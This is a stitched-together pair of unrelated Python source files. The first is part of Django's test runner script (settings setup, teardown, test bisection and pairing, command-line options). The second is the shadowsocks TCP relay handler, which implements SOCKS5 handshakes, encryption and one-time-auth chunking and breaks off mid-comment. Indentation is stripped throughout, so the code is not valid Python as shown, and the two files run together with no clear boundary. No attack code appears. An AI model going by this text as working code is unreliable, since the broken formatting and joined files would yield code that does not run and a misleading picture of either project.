def get_installed():
from django.apps import apps
return [app_config.name for app_config in apps.get_app_configs()]
def setup(verbosity, test_labels):
from django.apps import apps
from django.conf import settings
from django.test import TransactionTestCase, TestCase
print("Testing against Django installed in '%s'" % os.path.dirname(django.__file__))
# Force declaring available_apps in TransactionTestCase for faster tests.
def no_available_apps(self):
raise Exception("Please define available_apps in TransactionTestCase "
"and its subclasses.")
TransactionTestCase.available_apps = property(no_available_apps)
TestCase.available_apps = None
state = {
'INSTALLED_APPS': settings.INSTALLED_APPS,
'ROOT_URLCONF': getattr(settings, "ROOT_URLCONF", ""),
'TEMPLATE_DIRS': settings.TEMPLATE_DIRS,
'LANGUAGE_CODE': settings.LANGUAGE_CODE,
'STATIC_URL': settings.STATIC_URL,
'STATIC_ROOT': settings.STATIC_ROOT,
'MIDDLEWARE_CLASSES': settings.MIDDLEWARE_CLASSES,
}
# Redirect some settings for the duration of these tests.
settings.INSTALLED_APPS = ALWAYS_INSTALLED_APPS
settings.ROOT_URLCONF = 'urls'
settings.STATIC_URL = '/static/'
settings.STATIC_ROOT = os.path.join(TEMP_DIR, 'static')
settings.TEMPLATE_DIRS = (os.path.join(RUNTESTS_DIR, TEST_TEMPLATE_DIR),)
settings.LANGUAGE_CODE = 'en'
settings.SITE_ID = 1
settings.MIDDLEWARE_CLASSES = ALWAYS_MIDDLEWARE_CLASSES
# Ensure the middleware classes are seen as overridden otherwise we get a compatibility warning.
settings._explicit_settings.add('MIDDLEWARE_CLASSES')
settings.MIGRATION_MODULES = {
# these 'tests.migrations' modules don't actually exist, but this lets
# us skip creating migrations for the test models.
'auth': 'django.contrib.auth.tests.migrations',
'contenttypes': 'django.contrib.contenttypes.tests.migrations',
}
if verbosity > 0:
# Ensure any warnings captured to logging are piped through a verbose
        # logging handler. If any -W options were passed explicitly on the
        # command line, warnings are not captured, and this has no effect.
logger = logging.getLogger('py.warnings')
handler = logging.StreamHandler()
logger.addHandler(handler)
warnings.filterwarnings(
'ignore',
'django.contrib.comments is deprecated and will be removed before Django 1.8.',
RemovedInDjango18Warning
)
warnings.filterwarnings(
'ignore',
'Model class django.contrib.comments.models.* Django 1.9.',
RemovedInDjango19Warning
)
# Load all the ALWAYS_INSTALLED_APPS.
django.setup()
# Load all the test model apps.
test_modules = get_test_modules()
# Reduce given test labels to just the app module path
test_labels_set = set()
for label in test_labels:
bits = label.split('.')
if bits[:2] == ['django', 'contrib']:
bits = bits[:3]
else:
bits = bits[:1]
test_labels_set.add('.'.join(bits))
installed_app_names = set(get_installed())
for modpath, module_name in test_modules:
if modpath:
module_label = '.'.join([modpath, module_name])
else:
module_label = module_name
# if the module (or an ancestor) was named on the command line, or
# no modules were named (i.e., run all), import
# this module and add it to INSTALLED_APPS.
if not test_labels:
module_found_in_labels = True
else:
module_found_in_labels = any(
# exact match or ancestor match
module_label == label or module_label.startswith(label + '.')
for label in test_labels_set)
if module_found_in_labels and module_label not in installed_app_names:
if verbosity >= 2:
print("Importing application %s" % module_name)
settings.INSTALLED_APPS.append(module_label)
apps.set_installed_apps(settings.INSTALLED_APPS)
return state
def teardown(state):
from django.conf import settings
try:
# Removing the temporary TEMP_DIR. Ensure we pass in unicode
# so that it will successfully remove temp trees containing
# non-ASCII filenames on Windows. (We're assuming the temp dir
# name itself does not contain non-ASCII characters.)
shutil.rmtree(six.text_type(TEMP_DIR))
except OSError:
print('Failed to remove temp directory: %s' % TEMP_DIR)
# Restore the old settings.
for key, value in state.items():
setattr(settings, key, value)
def django_tests(verbosity, interactive, failfast, test_labels):
from django.conf import settings
state = setup(verbosity, test_labels)
extra_tests = []
# Run the test suite, including the extra validation tests.
from django.test.utils import get_runner
if not hasattr(settings, 'TEST_RUNNER'):
settings.TEST_RUNNER = 'django.test.runner.DiscoverRunner'
TestRunner = get_runner(settings)
test_runner = TestRunner(
verbosity=verbosity,
interactive=interactive,
failfast=failfast,
)
# Catch warnings thrown in test DB setup -- remove in Django 1.9
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
"Custom SQL location '<app_label>/models/sql' is deprecated, "
"use '<app_label>/sql' instead.",
RemovedInDjango19Warning
)
warnings.filterwarnings(
'ignore',
'initial_data fixtures are deprecated. Use data migrations instead.',
RemovedInDjango19Warning
)
warnings.filterwarnings(
'ignore',
'IPAddressField has been deprecated. Use GenericIPAddressField instead.',
RemovedInDjango19Warning
)
failures = test_runner.run_tests(
test_labels or get_installed(), extra_tests=extra_tests)
teardown(state)
return failures
def bisect_tests(bisection_label, options, test_labels):
state = setup(int(options.verbosity), test_labels)
test_labels = test_labels or get_installed()
print('***** Bisecting test suite: %s' % ' '.join(test_labels))
# Make sure the bisection point isn't in the test list
# Also remove tests that need to be run in specific combinations
for label in [bisection_label, 'model_inheritance_same_model_name']:
try:
test_labels.remove(label)
except ValueError:
pass
subprocess_args = [
sys.executable, upath(__file__), '--settings=%s' % options.settings]
if options.failfast:
subprocess_args.append('--failfast')
if options.verbosity:
subprocess_args.append('--verbosity=%s' % options.verbosity)
if not options.interactive:
subprocess_args.append('--noinput')
iteration = 1
while len(test_labels) > 1:
midpoint = len(test_labels) // 2
test_labels_a = test_labels[:midpoint] + [bisection_label]
test_labels_b = test_labels[midpoint:] + [bisection_label]
print('***** Pass %da: Running the first half of the test suite' % iteration)
print('***** Test labels: %s' % ' '.join(test_labels_a))
failures_a = subprocess.call(subprocess_args + test_labels_a)
print('***** Pass %db: Running the second half of the test suite' % iteration)
print('***** Test labels: %s' % ' '.join(test_labels_b))
print('')
failures_b = subprocess.call(subprocess_args + test_labels_b)
if failures_a and not failures_b:
print("***** Problem found in first half. Bisecting again...")
iteration = iteration + 1
test_labels = test_labels_a[:-1]
elif failures_b and not failures_a:
print("***** Problem found in second half. Bisecting again...")
iteration = iteration + 1
test_labels = test_labels_b[:-1]
elif failures_a and failures_b:
print("***** Multiple sources of failure found")
break
else:
print("***** No source of failure found... try pair execution (--pair)")
break
if len(test_labels) == 1:
print("***** Source of error: %s" % test_labels[0])
teardown(state)
def paired_tests(paired_test, options, test_labels):
state = setup(int(options.verbosity), test_labels)
test_labels = test_labels or get_installed()
print('***** Trying paired execution')
# Make sure the constant member of the pair isn't in the test list
# Also remove tests that need to be run in specific combinations
for label in [paired_test, 'model_inheritance_same_model_name']:
try:
test_labels.remove(label)
except ValueError:
pass
subprocess_args = [
sys.executable, upath(__file__), '--settings=%s' % options.settings]
if options.failfast:
subprocess_args.append('--failfast')
if options.verbosity:
subprocess_args.append('--verbosity=%s' % options.verbosity)
if not options.interactive:
subprocess_args.append('--noinput')
for i, label in enumerate(test_labels):
print('***** %d of %d: Check test pairing with %s' % (
i + 1, len(test_labels), label))
failures = subprocess.call(subprocess_args + [label, paired_test])
if failures:
print('***** Found problem pair with %s' % label)
return
print('***** No problem pair found')
teardown(state)
if __name__ == "__main__":
from optparse import OptionParser
usage = "%prog [options] [module module module ...]"
parser = OptionParser(usage=usage)
parser.add_option(
'-v', '--verbosity', action='store', dest='verbosity', default='1',
type='choice', choices=['0', '1', '2', '3'],
        help='Verbosity level; 0=minimal output, 1=normal output, '
             '2=verbose output, 3=very verbose output')
parser.add_option(
'--noinput', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.')
parser.add_option(
'--failfast', action='store_true', dest='failfast', default=False,
help='Tells Django to stop running the test suite after first failed '
'test.')
parser.add_option(
'--settings',
help='Python path to settings module, e.g. "myproject.settings". If '
'this isn\'t provided, the DJANGO_SETTINGS_MODULE environment '
'variable will be used.')
parser.add_option(
'--bisect', action='store', dest='bisect', default=None,
help='Bisect the test suite to discover a test that causes a test '
'failure when combined with the named test.')
parser.add_option(
'--pair', action='store', dest='pair', default=None,
help='Run the test suite in pairs with the named test to find problem '
'pairs.')
parser.add_option(
'--liveserver', action='store', dest='liveserver', default=None,
help='Overrides the default address where the live server (used with '
'LiveServerTestCase) is expected to run from. The default value '
'is localhost:8081.')
parser.add_option(
'--selenium', action='store_true', dest='selenium',
default=False,
help='Run the Selenium tests as well (if Selenium is installed)')
options, args = parser.parse_args()
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
else:
if "DJANGO_SETTINGS_MODULE" not in os.environ:
os.environ['DJANGO_SETTINGS_MODULE'] = 'test_sqlite'
options.settings = os.environ['DJANGO_SETTINGS_MODULE']
if options.liveserver is not None:
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = options.liveserver
if options.selenium:
os.environ['DJANGO_SELENIUM_TESTS'] = '1'
if options.bisect:
bisect_tests(options.bisect, options, args)
elif options.pair:
paired_tests(options.pair, options, args)
else:
failures = django_tests(int(options.verbosity), options.interactive,
options.failfast, args)
if failures:
sys.exit(bool(failures))
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import sys
import time
import socket
import errno
import struct
import logging
import traceback
import random
from shadowsocks import encrypt, eventloop, shell, common
from shadowsocks.common import parse_header, onetimeauth_verify, \
onetimeauth_gen, ONETIMEAUTH_BYTES, ONETIMEAUTH_CHUNK_BYTES, \
ONETIMEAUTH_CHUNK_DATA_LEN, ADDRTYPE_AUTH
# we clear at most TIMEOUTS_CLEAN_SIZE timeouts each time
TIMEOUTS_CLEAN_SIZE = 512
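# MSG_FASTOPEN is the sendto() flag for TCP Fast Open on Linux (send data in
# the SYN); defined here because not every Python socket module exposes it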
MSG_FASTOPEN = 0x20000000
# SOCKS command definition
CMD_CONNECT = 1
CMD_BIND = 2
CMD_UDP_ASSOCIATE = 3
# for each opening port, we have a TCP Relay
# for each connection, we have a TCP Relay Handler to handle the connection
# for each handler, we have 2 sockets:
# local: connected to the client
# remote: connected to remote server
# for each handler, it could be at one of several stages:
# as sslocal:
# stage 0 SOCKS hello received from local, send hello to local
# stage 1 addr received from local, query DNS for remote
# stage 2 UDP assoc
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
# as ssserver:
# stage 0 just jump to stage 1
# stage 1 addr received from local, query DNS for remote
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
STAGE_INIT = 0
STAGE_ADDR = 1
STAGE_UDP_ASSOC = 2
STAGE_DNS = 3
STAGE_CONNECTING = 4
STAGE_STREAM = 5
STAGE_DESTROYED = -1
# for each handler, we have 2 stream directions:
# upstream: from client to server direction
# read local and write to remote
# downstream: from server to client direction
# read remote and write to local
STREAM_UP = 0
STREAM_DOWN = 1
# for each stream, it's waiting for reading, or writing, or both
WAIT_STATUS_INIT = 0
WAIT_STATUS_READING = 1
WAIT_STATUS_WRITING = 2
WAIT_STATUS_READWRITING = WAIT_STATUS_READING | WAIT_STATUS_WRITING
BUF_SIZE = 32 * 1024
class TCPRelayHandler(object):
def __init__(self, server, fd_to_handlers, loop, local_sock, config,
dns_resolver, is_local):
self._server = server
self._fd_to_handlers = fd_to_handlers
self._loop = loop
self._local_sock = local_sock
self._remote_sock = None
self._config = config
self._dns_resolver = dns_resolver
# TCP Relay works as either sslocal or ssserver
# if is_local, this is sslocal
self._is_local = is_local
self._stage = STAGE_INIT
self._encryptor = encrypt.Encryptor(config['password'],
config['method'])
if 'one_time_auth' in config and config['one_time_auth']:
self._ota_enable = True
else:
self._ota_enable = False
self._ota_buff_head = b''
self._ota_buff_data = b''
self._ota_len = 0
self._ota_chunk_idx = 0
self._fastopen_connected = False
self._data_to_write_to_local = []
self._data_to_write_to_remote = []
self._upstream_status = WAIT_STATUS_READING
self._downstream_status = WAIT_STATUS_INIT
self._client_address = local_sock.getpeername()[:2]
self._remote_address = None
if 'forbidden_ip' in config:
self._forbidden_iplist = config['forbidden_ip']
else:
self._forbidden_iplist = None
if is_local:
self._chosen_server = self._get_a_server()
fd_to_handlers[local_sock.fileno()] = self
local_sock.setblocking(False)
local_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
loop.add(local_sock, eventloop.POLL_IN | eventloop.POLL_ERR,
self._server)
self.last_activity = 0
self._update_activity()
def __hash__(self):
# default __hash__ is id / 16
# we want to eliminate collisions
return id(self)
@property
def remote_address(self):
return self._remote_address
def _get_a_server(self):
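        # pick the (server, port) pair to use; when lists are configured,
        # choose one at random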
server = self._config['server']
server_port = self._config['server_port']
if type(server_port) == list:
server_port = random.choice(server_port)
if type(server) == list:
server = random.choice(server)
logging.debug('chosen server: %s:%d', server, server_port)
return server, server_port
def _update_activity(self, data_len=0):
# tell the TCP Relay we have activities recently
# else it will think we are inactive and timed out
self._server.update_activity(self, data_len)
def _update_stream(self, stream, status):
# update a stream to a new waiting status
# check if status is changed
# only update if dirty
dirty = False
if stream == STREAM_DOWN:
if self._downstream_status != status:
self._downstream_status = status
dirty = True
elif stream == STREAM_UP:
if self._upstream_status != status:
self._upstream_status = status
dirty = True
if dirty:
if self._local_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
if self._upstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
self._loop.modify(self._local_sock, event)
if self._remote_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
if self._upstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
self._loop.modify(self._remote_sock, event)
def _write_to_sock(self, data, sock):
# write data to sock
# if only some of the data are written, put remaining in the buffer
# and update the stream to wait for writing
if not data or not sock:
return False
uncomplete = False
try:
l = len(data)
s = sock.send(data)
if s < l:
data = data[s:]
uncomplete = True
except (socket.error, OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if sys.platform == "win32":
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK, errno.WSAEWOULDBLOCK):
uncomplete = True
elif error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
uncomplete = True
else:
shell.print_exception(e)
self.destroy()
return False
if uncomplete:
if sock == self._local_sock:
self._data_to_write_to_local.append(data)
self._update_stream(STREAM_DOWN, WAIT_STATUS_WRITING)
elif sock == self._remote_sock:
self._data_to_write_to_remote.append(data)
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
else:
logging.error('write_all_to_sock:unknown socket')
else:
if sock == self._local_sock:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
elif sock == self._remote_sock:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
else:
logging.error('write_all_to_sock:unknown socket')
return True
def _handle_stage_connecting(self, data):
if self._is_local:
if self._ota_enable:
data = self._ota_chunk_data_gen(data)
data = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data)
else:
if self._ota_enable:
self._ota_chunk_data(data,
self._data_to_write_to_remote.append)
else:
self._data_to_write_to_remote.append(data)
if self._is_local and not self._fastopen_connected and \
self._config['fast_open']:
# for sslocal and fastopen, we basically wait for data and use
# sendto to connect
try:
# only connect once
self._fastopen_connected = True
remote_sock = \
self._create_remote_socket(self._chosen_server[0],
self._chosen_server[1])
self._loop.add(remote_sock, eventloop.POLL_ERR, self._server)
data = b''.join(self._data_to_write_to_remote)
l = len(data)
s = remote_sock.sendto(data, MSG_FASTOPEN,
self._chosen_server)
if s < l:
data = data[s:]
self._data_to_write_to_remote = [data]
else:
self._data_to_write_to_remote = []
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
except (socket.error, OSError, IOError) as e:
if eventloop.errno_from_exception(e) == errno.EINPROGRESS:
# in this case data is not sent at all
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
elif eventloop.errno_from_exception(e) == errno.ENOTCONN:
logging.error('fast open not supported on this OS')
self._config['fast_open'] = False
self.destroy()
else:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _handle_stage_addr(self, data):
try:
if self._is_local:
cmd = common.ord(data[1])
if cmd == CMD_UDP_ASSOCIATE:
logging.debug('UDP associate')
if self._local_sock.family == socket.AF_INET6:
header = b'\x05\x00\x00\x04'
else:
header = b'\x05\x00\x00\x01'
addr, port = self._local_sock.getsockname()[:2]
addr_to_send = socket.inet_pton(self._local_sock.family,
addr)
port_to_send = struct.pack('>H', port)
self._write_to_sock(header + addr_to_send + port_to_send,
self._local_sock)
self._stage = STAGE_UDP_ASSOC
# just wait for the client to disconnect
return
elif cmd == CMD_CONNECT:
# just trim VER CMD RSV
data = data[3:]
else:
logging.error('unknown command %d', cmd)
self.destroy()
return
header_result = parse_header(data)
if header_result is None:
raise Exception('can not parse header')
addrtype, remote_addr, remote_port, header_length = header_result
logging.info('connecting %s:%d from %s:%d' %
(common.to_str(remote_addr), remote_port,
self._client_address[0], self._client_address[1]))
if self._is_local is False:
# spec https://shadowsocks.org/en/spec/one-time-auth.html
if self._ota_enable or addrtype & ADDRTYPE_AUTH:
if len(data) < header_length + ONETIMEAUTH_BYTES:
logging.warn('one time auth header is too short')
return None
offset = header_length + ONETIMEAUTH_BYTES
_hash = data[header_length: offset]
_data = data[:header_length]
key = self._encryptor.decipher_iv + self._encryptor.key
if onetimeauth_verify(_hash, _data, key) is False:
logging.warn('one time auth fail')
self.destroy()
header_length += ONETIMEAUTH_BYTES
self._remote_address = (common.to_str(remote_addr), remote_port)
# pause reading
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
self._stage = STAGE_DNS
if self._is_local:
# forward address to remote
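                # SOCKS5 success reply (VER REP RSV ATYP) with a dummy
                # BND.ADDR/BND.PORT; clients generally ignore the value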
self._write_to_sock((b'\x05\x00\x00\x01'
b'\x00\x00\x00\x00\x10\x10'),
self._local_sock)
# spec https://shadowsocks.org/en/spec/one-time-auth.html
# ATYP & 0x10 == 1, then OTA is enabled.
if self._ota_enable:
data = common.chr(addrtype | ADDRTYPE_AUTH) + data[1:]
key = self._encryptor.cipher_iv + self._encryptor.key
data += onetimeauth_gen(data, key)
data_to_send = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data_to_send)
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(self._chosen_server[0],
self._handle_dns_resolved)
else:
if self._ota_enable:
data = data[header_length:]
self._ota_chunk_data(data,
self._data_to_write_to_remote.append)
elif len(data) > header_length:
self._data_to_write_to_remote.append(data[header_length:])
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(remote_addr,
self._handle_dns_resolved)
except Exception as e:
self._log_error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _create_remote_socket(self, ip, port):
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM,
socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("getaddrinfo failed for %s:%d" % (ip, port))
af, socktype, proto, canonname, sa = addrs[0]
if self._forbidden_iplist:
if common.to_str(sa[0]) in self._forbidden_iplist:
raise Exception('IP %s is in forbidden list, reject' %
common.to_str(sa[0]))
remote_sock = socket.socket(af, socktype, proto)
self._remote_sock = remote_sock
self._fd_to_handlers[remote_sock.fileno()] = self
remote_sock.setblocking(False)
remote_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
return remote_sock
def _handle_dns_resolved(self, result, error):
if error:
self._log_error(error)
self.destroy()
return
if result and result[1]:
ip = result[1]
try:
self._stage = STAGE_CONNECTING
remote_addr = ip
if self._is_local:
remote_port = self._chosen_server[1]
else:
remote_port = self._remote_address[1]
if self._is_local and self._config['fast_open']:
# for fastopen:
# wait for more data arrive and send them in one SYN
self._stage = STAGE_CONNECTING
# we don't have to wait for remote since it's not
# created
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
# TODO when there is already data in this packet
else:
# else do connect
remote_sock = self._create_remote_socket(remote_addr,
remote_port)
try:
remote_sock.connect((remote_addr, remote_port))
except (socket.error, OSError, IOError) as e:
if eventloop.errno_from_exception(e) == \
errno.EINPROGRESS:
pass
self._loop.add(remote_sock,
eventloop.POLL_ERR | eventloop.POLL_OUT,
self._server)
self._stage = STAGE_CONNECTING
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
return
except Exception as e:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _write_to_sock_remote(self, data):
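        # thin wrapper so _ota_chunk_data can use the remote socket as its
        # data callback during the STREAM stage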
self._write_to_sock(data, self._remote_sock)
def _ota_chunk_data(self, data, data_cb):
# spec https://shadowsocks.org/en/spec/one-time-auth.html
while len(data) > 0:
if self._ota_len == 0:
# get DATA.LEN + HMAC-SHA1
length = ONETIMEAUTH_CHUNK_BYTES - len(self._ota_buff_head)
self._ota_buff_head += data[:length]
data = data[length:]
if len(self._ota_buff_head) < ONETIMEAUTH_CHUNK_BYTES:
# wait more data
return
data_len = self._ota_buff_head[:ONETIMEAUTH_CHUNK_DATA_LEN]
self._ota_len = struct.unpack('>H', data_len)[0]
length = min(self._ota_len, len(data))
self._ota_buff_data += data[:length]
data = data[length:]
if len(self._ota_buff_data) == self._ota_len:
# get a chunk data
_hash = self._ota_buff_head[ONETIMEAUTH_CHUNK_DATA_LEN:]
_data = self._ota_buff_data
index = struct.pack('>I', self._ota_chunk_idx)
key = self._encryptor.decipher_iv + index
if onetimeauth_verify(_hash, _data, key) is False:
logging.warn('one time auth fail, drop chunk !')
else:
data_cb(self._ota_buff_data)
self._ota_chunk_idx += 1
self._ota_buff_head = b''
self._ota_buff_data = b''
self._ota_len = 0
return
def _ota_chunk_data_gen(self, data):
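        # per the one-time-auth spec, each chunk is DATA.LEN (2-byte big
        # endian) + HMAC-SHA1 tag (ONETIMEAUTH_BYTES long) + DATA, with the
        # HMAC keyed by the cipher IV concatenated with the big-endian
        # chunk index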
data_len = struct.pack(">H", len(data))
index = struct.pack('>I', self._ota_chunk_idx)
key = self._encryptor.cipher_iv + index
sha110 = onetimeauth_gen(data, key)
self._ota_chunk_idx += 1
return data_len + sha110 + data
def _handle_stage_stream(self, data):
if self._is_local:
if self._ota_enable:
data = self._ota_chunk_data_gen(data)
data = self._encryptor.encrypt(data)
self._write_to_sock(data, self._remote_sock)
else:
if self._ota_enable:
self._ota_chunk_data(data, self._write_to_sock_remote)
else:
self._write_to_sock(data, self._remote_sock)
return
def _on_local_read(self):
# handle all local read events and dispatch them to methods for
# each stage
if not self._local_sock:
return
is_local = self._is_local
data = None
try:
data = self._local_sock.recv(BUF_SIZE)
except (socket.error, OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if sys.platform == "win32":
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK, errno.WSAEWOULDBLOCK):
return
elif error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
self._update_activity(len(data))
if not is_local:
data = self._encryptor.decrypt(data)
if not data:
return
if self._stage == STAGE_STREAM:
self._handle_stage_stream(data)
return
elif is_local and self._stage == STAGE_INIT:
# TODO check auth method
            self._write_to_sock(b'\x05\x00', self._local_sock)
self._stage = STAGE_ADDR
return
elif self._stage == STAGE_CONNECTING:
self._handle_stage_connecting(data)
elif (is_local and self._stage == STAGE_ADDR) or \
(not is_local and self._stage == STAGE_INIT):
self._handle_stage_addr(data)
def _on_remote_read(self):
# handle all remote read events
data = None
try:
data = self._remote_sock.recv(BUF_SIZE)
except socket.error as err:
error_no = err.args[0]
if sys.platform == "win32":
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK, errno.WSAEWOULDBLOCK):
return
elif error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
self._update_activity(len(data))
if self._is_local:
data = self._encryptor.decrypt(data)
else:
data = self._encryptor.encrypt(data)
try:
self._write_to_sock(data, self._local_sock)
except Exception as e:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
# TODO use logging when debug completed
self.destroy()
def _on_local_write(self):
# handle local writable event
if self._data_to_write_to_local:
data = b''.join(self._data_to_write_to_local)
self._data_to_write_to_local = []
self._write_to_sock(data, self._local_sock)
else:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
def _on_remote_write(self):
# handle remote writable event
self._stage = STAGE_STREAM
if self._data_to_write_to_remote:
data = b''.join(self._data_to_write_to_remote)
self._data_to_write_to_remote = []
self._write_to_sock(data, self._remote_sock)
else:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
def _on_local_error(self):
logging.debug('got local error')
if self._local_sock:
logging.error(eventloop.get_sock_error(self._local_sock))
self.destroy()
def _on_remote_error(self):
logging.debug('got remote error')
if self._remote_sock:
logging.error(eventloop.get_sock_error(self._remote_sock))
self.destroy()
def handle_event(self, sock, event):
# handle all events in this handler and dispatch them to methods
if self._stage == STAGE_DESTROYED:
logging.debug('ignore handle_event: destroyed')
return
# order is important
if sock == self._remote_sock:
if event & eventloop.POLL_ERR:
self._on_remote_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_remote_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_remote_write()
elif sock == self._local_sock:
if event & eventloop.POLL_ERR:
self._on_local_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_local_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_local_write()
else:
logging.warn('unknown socket')
def _log_error(self, e):
logging.error('%s when handling connection from %s:%d' %
(e, self._client_address[0], self._client_address[1]))
def destroy(self):
# destroy the handler and release any resources
# promises:
# 1. destroy won't make another destroy() call inside
# 2. destroy releases resources so it prevents future call to destroy
# 3. destroy won't raise any exceptions
# if any of the promises are broken, it indicates a bug has been
        # introduced! most likely memory leaks, etc.
if self._stage == STAGE_DESTROYED:
            # this shouldn't happen
logging.debug('already destroyed')
return
self._stage = STAGE_DESTROYED
if self._remote_address:
logging.debug('destroy: %s:%d' %
self._remote_address)
else:
logging.debug('destroy')
if self._remote_sock:
logging.debug('destroying remote')
self._loop.remove(self._remote_sock)
del self._fd_to_handlers[self._remote_sock.fileno()]
self._remote_sock.close()
self._remote_sock = None
if self._local_sock:
logging.debug('destroying local')
self._loop.remove(self._local_sock)
del self._fd_to_handlers[self._local_sock.fileno()]
self._local_sock.close()
self._local_sock = None
self._dns_resolver.remove_callback(self._handle_dns_resolved)
self._server.remove_handler(self)
class TCPRelay(object):
def __init__(self, config, dns_resolver, is_local, stat_callback=None):
self._config = config
self._is_local = is_local
self._dns_resolver = dns_resolver
self._closed = False
self._eventloop = None
self._fd_to_handlers = {}
self._timeout = config['timeout']
self._timeouts = [] # a list for all the handlers
# we trim the timeouts once a while
self._timeout_offset = 0 # last checked position for timeout
self._handler_to_timeouts = {} # key: handler value: index in timeouts
if is_local:
listen_addr = config['local_address']
listen_port = config['local_port']
else:
listen_addr = config['server']
listen_port = config['server_port']
self._listen_port = listen_port
addrs = socket.getaddrinfo(listen_addr, listen_port, 0,
socket.SOCK_STREAM, socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("can't get addrinfo for %s:%d" %
(listen_addr, listen_port))
af, socktype, proto, canonname, sa = addrs[0]
server_socket = socket.socket(af, socktype, proto)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(sa)
server_socket.setblocking(False)
if config['fast_open']:
try:
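                # 23 is TCP_FASTOPEN on Linux; 5 is the queue length for
                # pending fast-open requests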
server_socket.setsockopt(socket.SOL_TCP, 23, 5)
except socket.error:
logging.error('warning: fast open is not available')
self._config['fast_open'] = False
server_socket.listen(1024)
self._server_socket = server_socket
self._stat_callback = stat_callback
def add_to_loop(self, loop):
if self._eventloop:
raise Exception('already add to loop')
if self._closed:
raise Exception('already closed')
self._eventloop = loop
self._eventloop.add(self._server_socket,
eventloop.POLL_IN | eventloop.POLL_ERR, self)
self._eventloop.add_periodic(self.handle_periodic)
def remove_handler(self, handler):
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
del self._handler_to_timeouts[hash(handler)]
def update_activity(self, handler, data_len):
if data_len and self._stat_callback:
self._stat_callback(self._listen_port, data_len)
# set handler to active
now = int(time.time())
if now - handler.last_activity < eventloop.TIMEOUT_PRECISION:
# thus we can lower timeout modification frequency
return
handler.last_activity = now
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
length = len(self._timeouts)
self._timeouts.append(handler)
self._handler_to_timeouts[hash(handler)] = length
def _sweep_timeout(self):
        # tornado's timeout memory management is more flexible than we need;
        # we just need a queue sorted by last_activity, which is faster than
        # heapq and allows O(1) insertion/removal, so we roll our own
if self._timeouts:
logging.log(shell.VERBOSE_LEVEL, 'sweeping timeouts')
now = time.time()
length = len(self._timeouts)
pos = self._timeout_offset
while pos < length:
handler = self._timeouts[pos]
if handler:
if now - handler.last_activity < self._timeout:
break
else:
if handler.remote_address:
logging.warn('timed out: %s:%d' %
handler.remote_address)
else:
logging.warn('timed out')
handler.destroy()
self._timeouts[pos] = None # free memory
pos += 1
else:
pos += 1
if pos > TIMEOUTS_CLEAN_SIZE and pos > length >> 1:
                # compact the timeout queue once the swept prefix exceeds
